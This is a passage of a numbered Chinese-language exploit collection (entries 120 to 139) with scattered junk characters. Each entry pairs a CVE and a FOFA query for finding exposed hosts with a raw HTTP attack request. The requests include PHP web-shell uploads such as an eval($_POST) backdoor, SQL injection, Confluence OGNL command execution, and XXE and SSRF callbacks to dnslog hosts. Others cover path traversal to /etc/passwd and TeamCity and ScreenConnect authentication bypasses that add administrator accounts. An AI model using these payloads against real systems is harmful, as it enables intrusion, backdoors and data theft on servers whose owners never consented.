4 V( x- P& ^5 `X-Remote-Addr: 1.1.1.1
/ F( R+ B. z C3 V2 P) i* ~Te: trailers1 L, c4 Y& B& p7 H
Connection: close5 P. P- K. j; r+ d8 u& J9 J
0 o7 t/ n( J" g0 C i. |0 {7 O
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456; k; O, w8 A& M0 c+ V0 F
, C' Z# g% V( d y K' p- E/ \
1 H- M$ z. S% K( p120. 北京百绰智能S40管理平台导入web.php任意文件上传/ k# W1 n. Z$ ^) u
CVE-2024-1253
' t% N5 R7 h0 V" w9 q) q3 pFOFA:title="Smart管理平台"
) _/ N' |! S4 mPOST /useratte/web.php? HTTP/1.1
* R9 D5 g% }& |- h0 s6 }* M& I) vHost: ip:port
+ I' }( Y( ~, C1 x& gCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
$ R4 |3 W3 W3 z& H/ kUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko0 x5 _4 m2 j0 y! k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# a) C+ r9 ]' M+ O- e8 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: w5 L; f$ O# U: W. A1 u
Accept-Encoding: gzip, deflate* T3 Z# U0 F' ~3 \# {
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
c0 a+ G" A0 _4 d9 l! xContent-Length: 597$ j2 f4 K g3 X# f" u0 L
Origin: https://ip:port* P) N9 \0 i2 s, ?4 S N
Referer: https://ip:port/sysmanage/licence.php! B( ?3 t. b& ]" u1 b/ f6 }% M& x: f
Upgrade-Insecure-Requests: 1
1 g( \% N' a. D; K+ MSec-Fetch-Dest: document9 s* X Y8 V7 t# F( { _$ t) o4 g1 h& ~
Sec-Fetch-Mode: navigate
+ _: d6 E5 j% L( S/ v& @; _; G% l0 I5 gSec-Fetch-Site: same-origin
' P3 h4 _5 s/ ASec-Fetch-User: ?1
0 q' r, F" C) X$ b( [9 {4 xTe: trailers
+ _. I* E, B! B Z% X9 tConnection: close( M( F; a2 v4 u
/ _# W2 a: ^+ I! f+ t8 B-----------------------------423289041236658752706300793284 Q: J9 K6 @" j$ w
Content-Disposition: form-data; name="file_upload"; filename="2.php"
( U7 O4 w; J$ G) b% c( ^5 zContent-Type: application/octet-stream
& ]: Y2 v+ g! _ A0 a/ Z' S8 u; ]# }- S1 k+ ~9 x
<?php phpinfo()?>
' [% {( Q" z" M* J9 F. X; A# N-----------------------------42328904123665875270630079328; e" t( k! ~( k/ N" G. x
Content-Disposition: form-data; name="id_type"
" L x* v$ c1 @" i' j2 | l8 e4 j# c' F8 L' k$ v) s
1; {! s% k7 {, b1 n0 f* r' j
-----------------------------423289041236658752706300793286 i9 x0 Z4 i2 j# Y4 }
Content-Disposition: form-data; name="1_ck"$ L4 n! U" q5 ^* r8 v9 {/ |8 H
8 |7 I3 f$ u+ g: Q! D
1_radhttp) H- x1 P2 t' w" _
-----------------------------423289041236658752706300793282 h3 k; z8 Z# D; s- w" g3 [+ u
Content-Disposition: form-data; name="mode"
4 {1 c, `& E4 O7 `* i/ |) E5 j3 h% J& p3 ?! |9 I6 N9 y' \9 e6 z
import) Z) q4 ~! f ]
-----------------------------42328904123665875270630079328
! @# h" Z3 P. Z6 E5 B& v- }! F7 f8 w. t2 W
# r5 [7 M- G1 [$ T/ P! V
文件路径/upload/2.php1 R! T7 Y) H4 }% G5 h: a
# d2 I" A" g+ z
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ C' K4 M, o& H# |CVE-2024-1918# g# B5 ]' a& t5 W8 u
FOFA:title="Smart管理平台"
5 _4 z& ]9 V, BPOST /useratte/userattestation.php HTTP/1.1
p3 V7 d# ?3 zHost: 192.168.40.130:8443
5 V8 W4 J# `: ?( q" J( ACookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
( b; O& {4 M( t2 e$ Z, _User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
! w0 ? d K- i. A" p. v% tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ S. ~+ T. Z$ m7 f$ [ `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: }# y: V8 N1 _% d
Accept-Encoding: gzip, deflate
0 C# [( P3 Q; e6 S, r' iContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328, _1 o2 C( n9 I4 q" B; _
Content-Length: 592
% S& G& |7 d( J, O# |Origin: https://192.168.40.130:8443! ?! J; e' S7 G+ g
Upgrade-Insecure-Requests: 1
" V! E+ G2 P3 E1 }Sec-Fetch-Dest: document
( U; S' T2 @& Y8 D" o% NSec-Fetch-Mode: navigate E# n* D5 ~$ w8 m, |
Sec-Fetch-Site: same-origin6 D( _' f2 i8 t, R: A
Sec-Fetch-User: ?14 g; F6 y# J; ?* @" L* b9 E8 A
Te: trailers# ^6 C; m: J9 R0 N
Connection: close& q: Q [5 n. H% ~# t7 v
) S2 ^- r; } W3 G+ N
-----------------------------42328904123665875270630079328
% x* Y& L+ ^2 c/ H$ J2 zContent-Disposition: form-data; name="web_img"; filename="1.php"1 B' E9 z; V3 m4 A
Content-Type: application/octet-stream" n, }( S! J- H: o& Z
: b U" \3 W( D% V. g& O5 C1 n<?php phpinfo();?>* K' ?% x/ u0 A& v
-----------------------------42328904123665875270630079328
, s( }0 S" l# Y3 Q1 |: SContent-Disposition: form-data; name="id_type"7 {0 Y/ Y( `3 M: \7 ?
6 M1 ?" o% Q! l O
1' L; F5 m& T* L+ j- O6 V
-----------------------------42328904123665875270630079328. L6 o7 a5 \6 i8 D
Content-Disposition: form-data; name="1_ck"1 \4 A* _: J0 T* d7 T1 u
) ]8 G% K$ c8 M% G
1_radhttp+ O8 P# N' x5 N- ?3 @4 a/ d
-----------------------------423289041236658752706300793282 K2 h7 l* W$ I; J5 b
Content-Disposition: form-data; name="hidwel"% Y. P7 _7 |$ V) C( O+ ^9 H# }
+ ~6 r$ [( c; A9 |# q: T
set& Q' w& `) L5 z% n# _
-----------------------------42328904123665875270630079328
9 Y+ |5 c# ]3 a9 A
! Y: d. `% B1 V! g
7 h5 j# X5 `! t; e' H1 nboot/web/upload/weblogo/1.php! Z o, U/ J8 U* |& d! Z
, Y8 {! X6 p! v: u, B122. 北京百绰智能s200管理平台/importexport.php sql注入
! x/ f2 W/ g R! a; CCVE-2024-27718FOFA:title="Smart管理平台"3 N2 p) m" y' u, k- o. R& K
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
+ r9 H; A! g% ZGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.12 _( k8 `. Q# E- a4 Y
Host: x.x.x.x
2 A+ \. t: P0 g7 v" N1 t+ L' N2 ]+ ACookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc00 [% }: }+ i9 \$ s/ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 {1 |: z, y* A+ [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- O p2 u6 y4 x& X8 {6 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. E2 m+ o/ o0 ?( U9 Q. q3 @
Accept-Encoding: gzip, deflate, br( p6 k5 ?8 o: ]. F/ }8 n
Upgrade-Insecure-Requests: 1
( E3 m6 ]: D4 k" ^Sec-Fetch-Dest: document
) Q- c: l4 k7 P( [; n) u, bSec-Fetch-Mode: navigate
- i6 y) }6 C& T! H" d& [Sec-Fetch-Site: none
" i! R3 x, c: N- {! s$ m5 ^Sec-Fetch-User: ?1+ R( O) o8 _: R/ s
Te: trailers
) F3 s, ~% k" r' F- K5 {0 }Connection: close
: V/ Z+ O4 u& q! M4 Z1 |
4 F$ _+ p* U4 d
5 {7 ~# U" {* j0 p8 V1 `+ R; t123. Atlassian Confluence 模板注入代码执行7 v# B) @7 H% H' g
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"& v& g2 g- z8 d8 e8 y2 ^
POST /template/aui/text-inline.vm HTTP/1.1+ ?/ o( }& w- a% ~! z
Host: localhost:8090" R7 O9 ]8 ^, x4 ~; O
Accept-Encoding: gzip, deflate, br
1 D" m; K& y' AAccept: */*
i3 C5 G; H+ m/ kAccept-Language: en-US;q=0.9,en;q=0.8
4 f7 N. Q* I, C2 Q( S2 c! ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 i6 E; K. c4 c6 ?' B) OConnection: close
2 g7 v. {0 s. y6 b' S YContent-Type: application/x-www-form-urlencoded
+ H( d6 e! C! w* {, H V/ s
6 N: n3 p. R- J9 i+ L4 v- j) Blabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
, y' F6 ~ ?) Q1 R9 {/ {0 ]- q: X. Z2 N1 t: K$ b6 ?5 W
& H% r( e) x% a! F: ~124. 湖南建研工程质量检测系统任意文件上传1 f5 o1 V( a3 f g0 Z4 Y1 g. X
FOFA:body="/Content/Theme/Standard/webSite/login.css" z. w6 G; e/ a( b# r! E
POST /Scripts/admintool?type=updatefile HTTP/1.10 f8 L- U9 e$ c: g& g9 k
Host: 192.168.40.130:82828 P, C8 w" r# f$ l) V+ P* R
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+ H) L- U3 X: \0 {! _, yContent-Length: 72
3 ?# d# F: w- I; I5 |- ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
7 G$ x" l n. k: pAccept-Encoding: gzip, deflate, br- h& h. }- g5 h
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) a3 u/ ~% i! bConnection: close+ k2 O; u' Z! `3 n5 O% _2 ~
Content-Type: application/x-www-form-urlencoded
7 V5 v! F3 e1 L, K% o; L# J: D+ T2 p# m2 a
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
, J- w, n r* L+ t# k0 [3 Q' N9 q+ t, r0 [
" L% D3 E D0 w) h' Uhttp://192.168.40.130:8282/Scripts/abcgcg.aspx, @" X7 T# x9 j* l7 p; h
* O, E: R( h7 Z7 q3 }
125. ConnectWise ScreenConnect身份验证绕过2 ~1 T. \! \- L& U8 ~! o
CVE-2024-1709
# _ H T8 W' o+ Q! i- LFOFA:icon_hash="-82958153"( R6 }" q9 [1 s' l9 W+ e# R1 ^6 C/ g
https://github.com/watchtowrlabs ... bypass-add-user-poc
& k% R' z D' l, N9 ?! U, ?7 l3 b7 F2 b
9 z! Z/ [& `$ `. K0 f1 }
使用方法
- X$ `$ Z. }' y& s% g. gpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!6 n- O# x6 N" Z! `5 u$ ^/ d
$ O# i+ R6 [0 N+ Z, Z& a, _0 [8 F3 N0 _% V1 N; ~! x
创建好用户后直接登录后台,可以执行系统命令。; M1 {3 N% N6 j' M3 N; k* N
1 s# K% E- B% w( o
126. Aiohttp 路径遍历
I) k( a- z s, T3 v; dFOFA:title=="ComfyUI": Q3 _' A. K3 m2 J' B2 }5 L
GET /static/../../../../../etc/passwd HTTP/1.1
7 C& K( f& q4 M! O+ K9 dHost: x.x.x.x
; M; a' k v5 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 E4 h' O) @2 a* z8 f: ?Connection: close0 K; Y* Q. K+ e/ r. ?4 P
Accept: */*
2 R/ \2 X$ R* `6 X# C: XAccept-Language: en
( \! m* W8 h6 k3 c( jAccept-Encoding: gzip
- H' y6 l* I, W) j! a+ k- m, `( e* U
! z p/ G: F* @6 i% ^# K! f Z: _7 w% D# c3 C: Q( E. N' z% {% y2 f
127. 广联达Linkworks DataExchange.ashx XXE
" N2 v3 V I4 B* E3 V1 yFOFA:body="Services/Identification/login.ashx" 1 E" F" m4 V- E3 Q5 p
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1# O. X& [1 J2 q9 E7 `; F
Host: 192.168.40.130:8888
" w: ^: f- v" Z# G( I- qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36' L. y- r# t" I4 L' S ~# k
Content-Length: 415' }6 u Y8 A5 c0 ]6 Z+ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; L: {6 u/ q) AAccept-Encoding: gzip, deflate" z) n! v" M3 L) y8 C9 {9 G1 r* _
Accept-Language: zh-CN,zh;q=0.9, Z" R' u- x; c: L' v$ A# f5 S5 L
Connection: close1 Z( M: F0 m5 k5 S5 h$ o1 d7 J
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0+ p# P; |2 P1 y! |" e m6 X
Purpose: prefetch
( U& ] Z8 u$ ~1 d2 zSec-Purpose: prefetch;prerender- D9 `1 e& t( _& C$ z% t
$ ]% O ~) J) `+ R- Z9 l
------WebKitFormBoundaryJGgV5l5ta05yAIe0
' U6 p ?) ?2 j" Y9 ]# Z9 Q8 YContent-Disposition: form-data;name="SystemName"
5 h# F7 B. f6 y# g- V* Z) x% \2 P) s: _: y* j$ |. z
BIM$ O f$ g J I. d% _7 P0 Z7 }
------WebKitFormBoundaryJGgV5l5ta05yAIe0' |) Q* r4 T/ ^5 a' B* o
Content-Disposition: form-data;name="Params"! M2 B6 m* R5 x1 k; ], l! j; k
Content-Type: text/plain* Z3 G, ?$ D: I0 d$ _2 V* m/ X
8 o8 p8 G' t& p/ H) z<?xml version="1.0" encoding="UTF-8"?>
' S. g% F/ L( L$ A+ A+ D& q8 U2 ~3 o<!DOCTYPE test [
6 E4 k; U9 ]# X) ]7 S; O<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">+ P ^7 z' _. e. T7 [, X
]
! j# r# G6 A: L& g- q- @4 {6 A>
' w4 n$ z, M( C<test>&t;</test>
2 I! K1 E" v2 t( j8 Y" n------WebKitFormBoundaryJGgV5l5ta05yAIe0--! S# X, b8 @! f$ E* X
" b5 f5 M3 B1 H0 i/ `' J+ I: t Y
! X$ s" g% i+ A( m, n# f
9 F) C% L4 u: Q# K/ [" O128. Adobe ColdFusion 反序列化% j1 C8 |$ i9 N; P
CVE-2023-38203
* C# v' U! \8 Z& Z' |Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
+ o8 E. t( [5 v( }, c7 K3 L8 Q) ~FOFA:app="Adobe-ColdFusion", C9 ~! {4 b4 _1 r0 ?3 Q
PAYLOAD) y- n9 n; x2 p- {) N& }3 t% K
5 m, H3 D3 f3 V" B/ U; [4 c2 h
129. Adobe ColdFusion 任意文件读取, ]- G$ i. n; ~' H/ U }- X
CVE-2024-207678 {4 x7 D" H7 s, ?; i- w2 U' b
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( A7 m! ?( i7 e7 m; `# w, _
第一步,获取uuid
8 S1 O' K N6 W8 t! C) zGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1) m4 r" Q) b3 I+ d. s1 x3 H2 a7 @
Host: x.x.x.x
& j1 T2 G3 j& p* pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36$ [) y- d( Z" a* X1 G
Accept: */*3 j0 B& m" ?' o" x
Accept-Encoding: gzip, deflate4 I) t5 R( i, N2 _9 v
Connection: close
3 _* h* G* B4 G E. _1 A1 Q; e' P- @# e* M/ M) S" C
' ?4 L! p1 J! D8 L/ g5 g$ H
第二步,读取/etc/passwd文件4 L$ E* s K; n! U
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
# j5 N( G# E: z7 [. K2 N- oHost: x.x.x.x1 e: {5 c: \) o& q( O9 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 O9 K9 j. Y7 L; i9 O# OAccept: */*8 c7 A$ ]. N8 c1 t7 K: \
Accept-Encoding: gzip, deflate; B. O# M) |0 J' o7 n& O, l6 {7 W. y
Connection: close
, ~6 S: b# o2 @" t+ u8 huuid: 85f60018-a654-4410-a783-f81cbd5000b9
/ S# S0 R. P) g3 e+ }3 p, I5 B
+ i; ? G& f! E/ E7 _4 U
( u Z/ |$ p% K+ n2 U, j1 A- D5 [130. Laykefu客服系统任意文件上传1 N! ? e0 b7 E) F
FOFA:icon_hash="-334624619"* x. Z* S" R4 \
POST /admin/users/upavatar.html HTTP/1.1/ T+ r8 n' Z' ]- J! l
Host: 127.0.0.1
8 X! A$ }" t5 X s# ~, a5 l5 DAccept: application/json, text/javascript, */*; q=0.01* D0 L) i2 \- ?8 F3 f7 G5 R0 ]
X-Requested-With: XMLHttpRequest/ J) N5 ?' C0 ]( N* f1 ~ U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.263 V# N3 m$ b+ D: Q" x) w) U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
& u8 t3 C9 T/ F1 d5 {5 I- NAccept-Encoding: gzip, deflate7 Z3 f9 W" g- x: x% V
Accept-Language: zh-CN,zh;q=0.9
. F1 C( ]1 v$ O8 O% Y: Z; \) }Cookie: user_name=1; user_id=38 B, ^: c4 p& ]+ i! F
Connection: close
+ M+ r* J8 v% @5 ^
# @. v5 `7 R" H0 \2 K6 z------WebKitFormBoundary3OCVBiwBVsNuB2kR
! O5 T" D8 T9 Z: q7 \1 UContent-Disposition: form-data; name="file"; filename="1.php"2 G9 i% {- a3 k7 G, \
Content-Type: image/png
: x8 @( \: J' C2 e! @1 D
4 z$ U4 F! x# _% |/ p. g<?php phpinfo();@eval($_POST['sec']);?>- p( E1 J p5 p* h) P- Y: ?
------WebKitFormBoundary3OCVBiwBVsNuB2kR--, H, g B7 O* i/ ?0 j
) g* A: U9 A7 @( `/ c0 g) _
# R9 S. ~6 A& m131. Mini-Tmall <=20231017 SQL注入* x! }1 {* S; X3 `" N% i
FOFA:icon_hash="-2087517259"' x% Z; G, }7 B/ w- `5 a# |# R+ A+ a
后台地址:http://localhost:8080/tmall/admin
# ~2 {! k9 G( W$ Rhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)/ j0 b. X6 N9 X' K
) c, ?+ `" w0 Z6 S
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 {6 U0 ~5 o# JCVE-2024-27198: [. K1 x ]( y2 Y' s' i0 m
FOFA:body="Log in to TeamCity"
! H8 c4 O# g- d. d d9 M% z! IPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
/ s9 p5 D5 b* U h' jHost: 192.168.40.130:8111
4 j6 i/ V; y' v8 }4 s9 f. O9 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" h0 J% c1 J5 p, k9 E6 [
Accept: */*# g9 S7 B$ j1 \9 F/ y
Content-Type: application/json
1 Z8 k# \ a. `Accept-Encoding: gzip, deflate
. u% Y- u+ p# H( e Z$ h3 S4 Y& p% c; [7 z. [8 @: \, B
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
" O6 g9 ^# s* Z5 c3 j
" Y( R- [, J' W( _8 l4 E) g! v: ?& y3 k
CVE-2024-27199
& e; X. B* `. q8 Z+ a/res/../admin/diagnostic.jsp }( M) M, r7 U5 ]3 P8 i
/.well-known/acme-challenge/../../admin/diagnostic.jsp. b5 H% z! b8 c5 _ @0 n' R
/update/../admin/diagnostic.jsp
, w: ]/ u; u2 y' H0 c8 R) A
7 Z" v% E) z( I& x J J1 R) w8 j. l) p. l
CVE-2024-27198-RCE.py( f! a/ v$ J* { r
2 D" v' I5 L( ]1 P
133. H5 云商城 file.php 文件上传
2 F( p1 a. s3 g7 M. WFOFA:body="/public/qbsp.php"! Q* h/ e2 C' B4 j. M
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1! l8 X2 M% i; L* {4 V
Host: your-ip
2 Y2 y, ^/ n6 Z' ]: H2 ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, g4 Y% L3 j) ~: c
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
$ s6 g; v5 m' n" E& s) e0 g; b
2 n# S; P7 q& C' J------WebKitFormBoundaryFQqYtrIWb8iBxUCx( o5 e6 u P, e
Content-Disposition: form-data; name="file"; filename="rce.php"2 v3 D% Q V2 Y: B- j/ c
Content-Type: application/octet-stream' q" W7 e+ m3 o1 l2 T$ D
9 E: V( P/ C y3 }<?php system("cat /etc/passwd");unlink(__FILE__);?>
# U# w+ C0 E$ s; V; o------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
' Z% C. Z; K4 E/ L& [" j0 p4 d' }+ r. [0 Z
! ?1 z. `1 @" n r: g l4 Q5 @
/ u m9 t2 l1 S. @6 I0 E134. 网康NS-ASG应用安全网关index.php sql注入9 ]7 N: ?# N) n1 S W2 Z5 k
CVE-2024-2330
+ T* `. P) G d, h t$ @Netentsec NS-ASG Application Security Gateway 6.3版本2 p1 n- ]- n: N e5 J
FOFA:app="网康科技-NS-ASG安全网关"
9 ?$ z& S& |( U( fPOST /protocol/index.php HTTP/1.1
0 F: K9 D/ s0 O* \9 N' YHost: x.x.x.x+ p$ t0 s# ^4 A" s' d
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
7 J/ @; y7 c- eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.07 u- ~6 I3 @3 J, ]
Accept: */*
* ]* ?7 M; P% s3 e7 O* AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: t1 z* y; H- W: M. w" g. _" @$ ^" `) `Accept-Encoding: gzip, deflate2 W- y3 S0 X$ ^
Sec-Fetch-Dest: empty
8 R( Q8 y" `$ L6 ? _ eSec-Fetch-Mode: cors" S$ ~! r" M) y
Sec-Fetch-Site: same-origin
0 A. C" P+ `7 y+ c; |# UTe: trailers& L, [. a3 B' p+ r
Connection: close! O0 C7 \2 i# I- i( H, E5 s2 n
Content-Type: application/x-www-form-urlencoded
- v6 T* m5 i; S) @% kContent-Length: 263
5 M* k4 ^" Y8 f, h+ i7 u! D+ h1 a! h/ o" b; e
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
0 ]0 |7 T; B( c4 J* l) E8 Y
/ V2 o. G( [8 X" |6 o6 Y) M
* o D& Y& T2 C7 ~) R% p3 e135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" O7 I9 S; b9 E4 }5 m, S
CVE-2024-20227 f; {9 E3 b( h$ p7 W
Netentsec NS-ASG Application Security Gateway 6.3版本* H+ i9 _3 \, _# {% [3 o+ p/ P% r# X% N
FOFA:app="网康科技-NS-ASG安全网关"
$ j; @) n' B: O" f) h8 NGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
3 ~" F9 O8 X+ l8 b* pHost: x.x.x.x, J+ c% F9 m* P( T; w6 E, p2 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 L- }- @$ Y* ^% ^7 m: _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- v; i; J( p$ J( n+ s
Accept-Encoding: gzip, deflate
v8 g$ @: S1 E) KAccept-Language: zh-CN,zh;q=0.9; R1 X' w4 h* p9 ^5 O; u9 E
Connection: close7 C$ ?4 h* R/ N9 e4 A1 ]9 y! q8 x
# T6 y* L" u) y* M
0 ^; [# u; @) z/ ?136. NextChat cors SSRF3 e8 `; l0 [0 Z
CVE-2023-49785( F; C% x7 n; a: p0 Z
FOFA:title="NextChat"
! i% j6 K4 I6 b$ o+ ]GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1" h6 j# n: n: Z: Y5 k+ X/ t
Host: x.x.x.x:10000
0 d9 n( y3 A! D8 o. I; @# n- nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; [$ h7 i z$ j
Connection: close8 ^1 B/ N/ p; C
Accept: */*5 b0 R \) t3 l/ R% T8 n; `9 M. A
Accept-Language: en
0 J" N; b; Z! U9 d6 `Accept-Encoding: gzip3 ^1 H: ^* Z) r/ ]8 d& E6 ?
$ F1 C- H6 N0 r+ u
2 [) R' L* s; L( u6 \, i
137. 福建科立迅通信指挥调度平台down_file.php sql注入2 r3 e0 ?$ @. t a( H! V# R, e8 f
CVE-2024-2620+ Y9 |* W: b% H* z" ?
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 u9 P" ` ~9 B+ W" W' a7 S/ BGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1, @& d5 @% j& a" Z% \' V. T
Host: x.x.x.x+ d6 S" w& r2 R+ R5 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 V' o; h! d9 B+ c: R$ xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 A3 N' W3 e3 E+ J8 W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" N3 z$ D( ?) z, [Accept-Encoding: gzip, deflate, br
2 n1 h+ }% _- `! W* ]Connection: close
; L! f, `' u0 F& | ZCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
( s! a6 H" _; v8 ^2 T' h& G% ZUpgrade-Insecure-Requests: 1
. X+ `$ o. ?9 {, \. } D: w* g( H) D5 Y' q! ~9 \; K4 Z
' f. U: A1 I+ ?2 H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入$ ~- @' n( H$ r, u2 Z' _
CVE-2024-2621
i0 W" K' p3 O; }; PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 k4 r# T8 k2 i! R: }' M
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
* o4 K6 Q. x$ H9 L9 r9 GHost: x.x.x.x2 l6 M7 L1 `; V3 t6 D* C k& {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
; n. S1 M `4 Z. W5 y& T3 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 p% O* c5 \- ^% q/ Z1 G* F2 G8 j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, k* Y; Z' x- S- S% `# xAccept-Encoding: gzip, deflate, br
! X" M- ]5 v3 M7 s7 Z. n, _ lConnection: close/ z7 t+ z2 \4 D
Upgrade-Insecure-Requests: 16 v( Y; ]+ B _/ D# p! Q, ~
0 n$ @! g! _+ @8 J0 k0 ?
5 R# r' Z5 \5 X( @7 ]9 z8 c$ J8 W139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ R$ r3 f `- M" xCVE-2024-2622* T" _) [ o4 t. v: c7 {" N
